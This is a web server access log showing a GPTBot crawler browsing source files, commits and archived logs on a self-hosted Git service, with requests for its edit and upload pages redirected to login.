https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor/build" +[17/Feb/2026:16:16:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec?display=source" [Client 74.7.227.38] [Length 12746] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:16:16:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:16:16:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:16:16:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:16:16:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:16:16:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/PostgresMonitor/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build" +[17/Feb/2026:16:16:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/PostgresMonitor/build" +[17/Feb/2026:16:16:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/chromedriver.exe" +[17/Feb/2026:16:16:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/chromedriver.exe" +[17/Feb/2026:16:16:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 9788] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:16:16:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 12007] [Gzip 5.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:16:16:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor/build" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build" +[17/Feb/2026:16:16:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor/build" +[17/Feb/2026:16:16:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build" [Client 74.7.227.38] [Length 10272] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build" +[17/Feb/2026:16:16:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 9788] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/chromedriver.exe" +[17/Feb/2026:16:16:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/chromedriver.exe" [Client 74.7.227.38] [Length 866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/chromedriver.exe" +[17/Feb/2026:16:16:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 905] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:16:16:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:16:16:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=npm%2fdata%2flogs%2fproxy-host-2_access.log" [Client 74.7.227.38] [Length 25721] [Gzip 6.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:16:16:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fproxy-host-2_error.log" [Client 74.7.227.38] [Length 25400] [Gzip 5.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:16:16:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fproxy-host-1_error.log" [Client 74.7.227.38] [Length 26528] [Gzip 6.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:16:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fproxy-host-2_access.log" [Client 74.7.227.38] [Length 36043] [Gzip 10.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:16:16:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:16:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:16:16:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldSpotMonitor_Final.spec" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:16:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:16:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata%2flogs%2fproxy-host-1_access.log" [Client 74.7.227.38] [Length 26004] [Gzip 8.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:16:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata%2flogs%2fproxy-host-4_error.log" [Client 74.7.227.38] [Length 25529] [Gzip 6.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:16:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=npm%2fdata%2flogs%2fproxy-host-4_access.log" [Client 74.7.227.38] [Length 18022] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:16:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fproxy-host-3_error.log" [Client 74.7.227.38] [Length 23095] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:16:16:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata%2flogs%2fproxy-host-3_access.log" [Client 74.7.227.38] [Length 18390] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:16:16:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=npm%2fdata%2flogs%2fproxy-host-2_error.log" [Client 74.7.227.38] [Length 19220] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:16:16:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fproxy-host-1_access.log" [Client 74.7.227.38] [Length 27226] [Gzip 7.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:16:16:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=npm%2fdata%2flogs%2fproxy-host-3_error.log" [Client 74.7.227.38] [Length 20676] [Gzip 3.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:16:16:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=npm%2fdata%2flogs%2fproxy-host-3_access.log" [Client 74.7.227.38] [Length 25164] [Gzip 5.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:16:16:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata%2flogs%2fproxy-host-1_error.log" [Client 74.7.227.38] [Length 20869] [Gzip 4.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:16:16:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=npm%2fdata%2flogs%2fproxy-host-4_access.log" [Client 74.7.227.38] [Length 18448] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:16:16:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata%2flogs%2fproxy-host-3_access.log" [Client 74.7.227.38] [Length 37208] [Gzip 10.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:16:16:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=npm" [Client 74.7.227.38] [Length 52977] [Gzip 10.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm" +[17/Feb/2026:16:16:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild%2fgold_monitor_full%2flocalpycs%2fpyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 23806] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:16:16:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=mostcomplete&state=open" [Client 74.7.227.38] [Length 8498] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=mostcomplete&state=closed" +[17/Feb/2026:16:16:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=leastcomplete&state=all" [Client 74.7.227.38] [Length 8491] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=leastcomplete&state=open" +[17/Feb/2026:16:16:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fwatchdog_final_org.py" [Client 74.7.227.38] [Length 43610] [Gzip 9.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_org.py" +[17/Feb/2026:16:16:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/DOCKER_GUIDE.md?display=rendered" [Client 74.7.227.38] [Length 15943] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/DOCKER_GUIDE.md" +[17/Feb/2026:16:16:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 12590] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/docker-compose.yml" +[17/Feb/2026:16:16:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:16:16:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:16:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11041] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:16:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:16:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:16:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11043] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:16:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11048] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:16:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11042] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:16:16:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/lib64?display=source" [Client 74.7.227.38] [Length 11051] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:16:16:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/lib64?display=rendered" [Client 74.7.227.38] [Length 10996] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 